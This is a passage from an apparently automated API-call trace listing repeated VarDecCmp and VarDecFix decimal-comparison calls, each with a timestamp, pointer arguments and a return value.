(pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b760, pdecRight=0x1b62b750) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62b760, pdecRight=0x1b62b750) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62b760, pdecRight=0x1b62b750) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x0 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.442] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.442] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b760, pdecRight=0x1b62b750) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b8c0, pdecRight=0x1b62b8b0) returned 0x0 [0333.442] VarDecCmp (pdecLeft=0x1b62b800, pdecRight=0x1b62b7f0) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b800, pdecRight=0x1b62b7f0) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b800, pdecRight=0x1b62b7f0) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b800, pdecRight=0x1b62b7f0) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.442] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.442] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.443] VarDecCmp (pdecLeft=0x1b62b760, pdecRight=0x1b62b750) returned 0x1 [0333.443] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x0 [0333.443] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.443] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.443] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.443] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.510] VarDecCmp (pdecLeft=0x1b62c978, pdecRight=0x1b62c968) returned 0x2 [0333.510] VarDecCmp (pdecLeft=0x1b62c858, pdecRight=0x1b62c848) returned 0x2 [0333.510] VarDecFix (in: pdecIn=0x1b62c838, pdecResult=0x1b62c7c0 | out: pdecResult=0x1b62c7c0) returned 0x0 [0333.510] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x1 [0333.510] VarDecCmp (pdecLeft=0x1b62c850, pdecRight=0x1b62c840) returned 0x2 [0333.510] VarDecFix (in: pdecIn=0x1b62c830, pdecResult=0x1b62c7a0 | out: pdecResult=0x1b62c7a0) returned 0x0 [0333.510] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x1 [0333.510] VarDecCmp (pdecLeft=0x1b62c800, pdecRight=0x1b62c7f0) returned 0x2 [0333.510] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.510] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x1 [0333.510] VarDecCmp (pdecLeft=0x1b62c928, pdecRight=0x1b62c918) returned 0x2 [0333.510] VarDecCmp (pdecLeft=0x1b62c9f8, pdecRight=0x1b62c9e8) returned 0x2 [0333.511] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.511] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x2 [0333.511] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x2 [0333.511] VarDecCmp (pdecLeft=0x1b62c598, pdecRight=0x1b62c588) returned 0x2 [0333.512] VarDecCmp (pdecLeft=0x1b62c558, pdecRight=0x1b62c548) returned 0x1 [0333.512] VarDecCmp (pdecLeft=0x1b62c538, pdecRight=0x1b62c528) returned 0x1 [0333.512] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.512] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.517] VarDecCmp (pdecLeft=0x1b62c518, pdecRight=0x1b62c508) returned 0x0 [0333.517] VarDecCmp (pdecLeft=0x1b62c4f8, pdecRight=0x1b62c4e8) returned 0x2 [0333.517] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.517] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x0 [0333.518] VarDecCmp (pdecLeft=0x1b62c518, pdecRight=0x1b62c508) returned 0x0 [0333.518] VarDecCmp (pdecLeft=0x1b62c4f8, pdecRight=0x1b62c4e8) returned 0x2 [0333.518] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.518] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x0 [0333.523] VarDecCmp (pdecLeft=0x1b62c518, pdecRight=0x1b62c508) returned 0x0 [0333.523] VarDecCmp (pdecLeft=0x1b62c4f8, pdecRight=0x1b62c4e8) returned 0x2 [0333.523] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.523] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x0 [0333.523] VarDecCmp (pdecLeft=0x1b62c978, pdecRight=0x1b62c968) returned 0x2 [0333.523] VarDecCmp (pdecLeft=0x1b62c858, pdecRight=0x1b62c848) returned 0x2 [0333.523] VarDecFix (in: pdecIn=0x1b62c838, pdecResult=0x1b62c7c0 | out: pdecResult=0x1b62c7c0) returned 0x0 [0333.523] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x1 [0333.523] VarDecCmp (pdecLeft=0x1b62c850, pdecRight=0x1b62c840) returned 0x2 [0333.523] VarDecFix (in: pdecIn=0x1b62c830, pdecResult=0x1b62c7a0 | out: pdecResult=0x1b62c7a0) returned 0x0 [0333.523] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c800, pdecRight=0x1b62c7f0) returned 0x2 [0333.524] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.524] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c928, pdecRight=0x1b62c918) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.524] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c928, pdecRight=0x1b62c918) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.524] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x0 [0333.524] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.524] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x0 [0333.524] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.524] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x0 [0333.524] VarDecCmp (pdecLeft=0x1b62c9f8, pdecRight=0x1b62c9e8) returned 0x2 [0333.524] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.524] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.524] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.524] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.524] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.526] VarDecCmp (pdecLeft=0x1b62c978, pdecRight=0x1b62c968) returned 0x2 [0333.527] VarDecCmp (pdecLeft=0x1b62c858, pdecRight=0x1b62c848) returned 0x2 [0333.527] VarDecFix (in: pdecIn=0x1b62c838, pdecResult=0x1b62c7c0 | out: pdecResult=0x1b62c7c0) returned 0x0 [0333.527] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c850, pdecRight=0x1b62c840) returned 0x2 [0333.527] VarDecFix (in: pdecIn=0x1b62c830, pdecResult=0x1b62c7a0 | out: pdecResult=0x1b62c7a0) returned 0x0 [0333.527] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c800, pdecRight=0x1b62c7f0) returned 0x2 [0333.527] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.527] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c928, pdecRight=0x1b62c918) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.527] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c928, pdecRight=0x1b62c918) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.527] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x0 [0333.527] VarDecCmp (pdecLeft=0x1b62c9f8, pdecRight=0x1b62c9e8) returned 0x2 [0333.527] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.527] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.527] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c978, pdecRight=0x1b62c968) returned 0x2 [0333.528] VarDecCmp (pdecLeft=0x1b62c858, pdecRight=0x1b62c848) returned 0x2 [0333.528] VarDecFix (in: pdecIn=0x1b62c838, pdecResult=0x1b62c7c0 | out: pdecResult=0x1b62c7c0) returned 0x0 [0333.528] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c850, pdecRight=0x1b62c840) returned 0x2 [0333.528] VarDecFix (in: pdecIn=0x1b62c830, pdecResult=0x1b62c7a0 | out: pdecResult=0x1b62c7a0) returned 0x0 [0333.528] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c800, pdecRight=0x1b62c7f0) returned 0x2 [0333.528] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.528] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c928, pdecRight=0x1b62c918) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.528] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c928, pdecRight=0x1b62c918) returned 0x2 [0333.528] VarDecCmp (pdecLeft=0x1b62c9f8, pdecRight=0x1b62c9e8) returned 0x2 [0333.528] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x2 [0333.528] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x2 [0333.528] VarDecCmp (pdecLeft=0x1b62c598, pdecRight=0x1b62c588) returned 0x2 [0333.528] VarDecCmp (pdecLeft=0x1b62c558, pdecRight=0x1b62c548) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c538, pdecRight=0x1b62c528) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.528] VarDecCmp (pdecLeft=0x1b62c978, pdecRight=0x1b62c968) returned 0x2 [0333.528] VarDecCmp (pdecLeft=0x1b62c858, pdecRight=0x1b62c848) returned 0x2 [0333.529] VarDecFix (in: pdecIn=0x1b62c838, pdecResult=0x1b62c7c0 | out: pdecResult=0x1b62c7c0) returned 0x0 [0333.529] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x1 [0333.529] VarDecCmp (pdecLeft=0x1b62c850, pdecRight=0x1b62c840) returned 0x2 [0333.529] VarDecFix (in: pdecIn=0x1b62c830, pdecResult=0x1b62c7a0 | out: pdecResult=0x1b62c7a0) returned 0x0 [0333.529] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x1 [0333.529] VarDecCmp (pdecLeft=0x1b62c800, pdecRight=0x1b62c7f0) returned 0x2 [0333.529] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.529] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x1 [0333.529] VarDecCmp (pdecLeft=0x1b62c928, pdecRight=0x1b62c918) returned 0x1 [0333.529] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.529] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x0 [0333.529] VarDecCmp (pdecLeft=0x1b62c9f8, pdecRight=0x1b62c9e8) returned 0x2 [0333.529] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.529] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x1 [0333.529] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.529] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.529] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.529] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.529] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.530] VarDecCmp (pdecLeft=0x1b62c518, pdecRight=0x1b62c508) returned 0x0 [0333.530] VarDecCmp (pdecLeft=0x1b62c4f8, pdecRight=0x1b62c4e8) returned 0x2 [0333.530] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.530] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x0 [0333.530] VarDecCmp (pdecLeft=0x1b62c518, pdecRight=0x1b62c508) returned 0x0 [0333.530] VarDecCmp (pdecLeft=0x1b62c4f8, pdecRight=0x1b62c4e8) returned 0x2 [0333.530] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.530] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x0 [0333.531] VarDecCmp (pdecLeft=0x1b62c518, pdecRight=0x1b62c508) returned 0x0 [0333.531] VarDecCmp (pdecLeft=0x1b62c4f8, pdecRight=0x1b62c4e8) returned 0x2 [0333.531] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.531] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x0 [0333.531] VarDecCmp (pdecLeft=0x1b62c518, pdecRight=0x1b62c508) returned 0x0 [0333.531] VarDecCmp (pdecLeft=0x1b62c4f8, pdecRight=0x1b62c4e8) returned 0x2 [0333.531] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.531] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x0 [0333.532] VarDecCmp (pdecLeft=0x1b62c3e8, pdecRight=0x1b62c3d8) returned 0x0 [0333.532] VarDecCmp (pdecLeft=0x1b62c3c8, pdecRight=0x1b62c3b8) returned 0x2 [0333.532] VarDecCmp (pdecLeft=0x1b62c570, pdecRight=0x1b62c560) returned 0x2 [0333.532] VarDecCmp (pdecLeft=0x1b62c550, pdecRight=0x1b62c540) returned 0x0 [0333.532] VarDecCmp (pdecLeft=0x1b62c3e8, pdecRight=0x1b62c3d8) returned 0x0 [0333.532] VarDecCmp (pdecLeft=0x1b62c3c8, pdecRight=0x1b62c3b8) returned 0x2 [0333.532] VarDecCmp (pdecLeft=0x1b62c570, pdecRight=0x1b62c560) returned 0x2 [0333.532] VarDecCmp (pdecLeft=0x1b62c550, pdecRight=0x1b62c540) returned 0x0 [0333.533] VarDecCmp (pdecLeft=0x1b62c518, pdecRight=0x1b62c508) returned 0x0 [0333.533] VarDecCmp (pdecLeft=0x1b62c4f8, pdecRight=0x1b62c4e8) returned 0x2 [0333.533] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.533] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x0 [0333.534] VarDecCmp (pdecLeft=0x1b62c978, pdecRight=0x1b62c968) returned 0x2 [0333.534] VarDecCmp (pdecLeft=0x1b62c858, pdecRight=0x1b62c848) returned 0x2 [0333.534] VarDecFix (in: pdecIn=0x1b62c838, pdecResult=0x1b62c7c0 | out: pdecResult=0x1b62c7c0) returned 0x0 [0333.534] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x1 [0333.534] VarDecCmp (pdecLeft=0x1b62c850, pdecRight=0x1b62c840) returned 0x2 [0333.534] VarDecFix (in: pdecIn=0x1b62c830, pdecResult=0x1b62c7a0 | out: pdecResult=0x1b62c7a0) returned 0x0 [0333.534] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x1 [0333.534] VarDecCmp (pdecLeft=0x1b62c800, pdecRight=0x1b62c7f0) returned 0x2 [0333.534] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.534] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x0 [0333.534] VarDecCmp (pdecLeft=0x1b62c9f8, pdecRight=0x1b62c9e8) returned 0x2 [0333.534] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.534] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.534] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.534] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.534] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.535] VarDecCmp (pdecLeft=0x1b62c818, pdecRight=0x1b62c808) returned 0x2 [0333.535] VarDecCmp (pdecLeft=0x1b62c6f8, pdecRight=0x1b62c6e8) returned 0x2 [0333.535] VarDecFix (in: pdecIn=0x1b62c6d8, pdecResult=0x1b62c660 | out: pdecResult=0x1b62c660) returned 0x0 [0333.535] VarDecCmp (pdecLeft=0x1b62c6c8, pdecRight=0x1b62c6b8) returned 0x1 [0333.535] VarDecCmp (pdecLeft=0x1b62c6f0, pdecRight=0x1b62c6e0) returned 0x2 [0333.536] VarDecFix (in: pdecIn=0x1b62c6d0, pdecResult=0x1b62c640 | out: pdecResult=0x1b62c640) returned 0x0 [0333.536] VarDecCmp (pdecLeft=0x1b62c6c0, pdecRight=0x1b62c6b0) returned 0x1 [0333.536] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.536] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.536] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x0 [0333.536] VarDecCmp (pdecLeft=0x1b62c898, pdecRight=0x1b62c888) returned 0x2 [0333.536] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x0 [0333.536] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x1 [0333.536] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x1 [0333.536] VarDecCmp (pdecLeft=0x1b62c708, pdecRight=0x1b62c6f8) returned 0x1 [0333.536] VarDecCmp (pdecLeft=0x1b62c6e8, pdecRight=0x1b62c6d8) returned 0x1 [0333.536] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x0 [0333.536] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x2 [0333.536] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.536] VarDecCmp (pdecLeft=0x1b62c5e0, pdecRight=0x1b62c5d0) returned 0x0 [0333.536] VarDecCmp (pdecLeft=0x1b62c478, pdecRight=0x1b62c468) returned 0x0 [0333.536] VarDecCmp (pdecLeft=0x1b62c458, pdecRight=0x1b62c448) returned 0x2 [0333.536] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.536] VarDecCmp (pdecLeft=0x1b62c5e0, pdecRight=0x1b62c5d0) returned 0x0 [0333.537] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x2 [0333.537] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x2 [0333.537] VarDecFix (in: pdecIn=0x1b62c808, pdecResult=0x1b62c790 | out: pdecResult=0x1b62c790) returned 0x0 [0333.537] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x1 [0333.537] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x2 [0333.537] VarDecFix (in: pdecIn=0x1b62c800, pdecResult=0x1b62c770 | out: pdecResult=0x1b62c770) returned 0x0 [0333.537] VarDecCmp (pdecLeft=0x1b62c7f0, pdecRight=0x1b62c7e0) returned 0x1 [0333.537] VarDecCmp (pdecLeft=0x1b62c7d0, pdecRight=0x1b62c7c0) returned 0x2 [0333.537] VarDecCmp (pdecLeft=0x1b62c808, pdecRight=0x1b62c7f8) returned 0x2 [0333.537] VarDecCmp (pdecLeft=0x1b62c918, pdecRight=0x1b62c908) returned 0x0 [0333.537] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x2 [0333.537] VarDecCmp (pdecLeft=0x1b62c7b8, pdecRight=0x1b62c7a8) returned 0x2 [0333.538] VarDecFix (in: pdecIn=0x1b62c798, pdecResult=0x1b62c720 | out: pdecResult=0x1b62c720) returned 0x0 [0333.538] VarDecCmp (pdecLeft=0x1b62c788, pdecRight=0x1b62c778) returned 0x1 [0333.538] VarDecCmp (pdecLeft=0x1b62c7b0, pdecRight=0x1b62c7a0) returned 0x2 [0333.538] VarDecFix (in: pdecIn=0x1b62c790, pdecResult=0x1b62c700 | out: pdecResult=0x1b62c700) returned 0x0 [0333.538] VarDecCmp (pdecLeft=0x1b62c780, pdecRight=0x1b62c770) returned 0x1 [0333.538] VarDecCmp (pdecLeft=0x1b62c760, pdecRight=0x1b62c750) returned 0x2 [0333.538] VarDecCmp (pdecLeft=0x1b62c768, pdecRight=0x1b62c758) returned 0x2 [0333.538] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x2 [0333.538] VarDecFix (in: pdecIn=0x1b62c628, pdecResult=0x1b62c5b0 | out: pdecResult=0x1b62c5b0) returned 0x0 [0333.538] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.538] VarDecCmp (pdecLeft=0x1b62c640, pdecRight=0x1b62c630) returned 0x2 [0333.538] VarDecFix (in: pdecIn=0x1b62c620, pdecResult=0x1b62c590 | out: pdecResult=0x1b62c590) returned 0x0 [0333.538] VarDecCmp (pdecLeft=0x1b62c610, pdecRight=0x1b62c600) returned 0x1 [0333.538] VarDecCmp (pdecLeft=0x1b62c5f0, pdecRight=0x1b62c5e0) returned 0x2 [0333.538] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x2 [0333.538] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x0 [0333.538] VarDecCmp (pdecLeft=0x1b62c6f8, pdecRight=0x1b62c6e8) returned 0x1 [0333.538] VarDecCmp 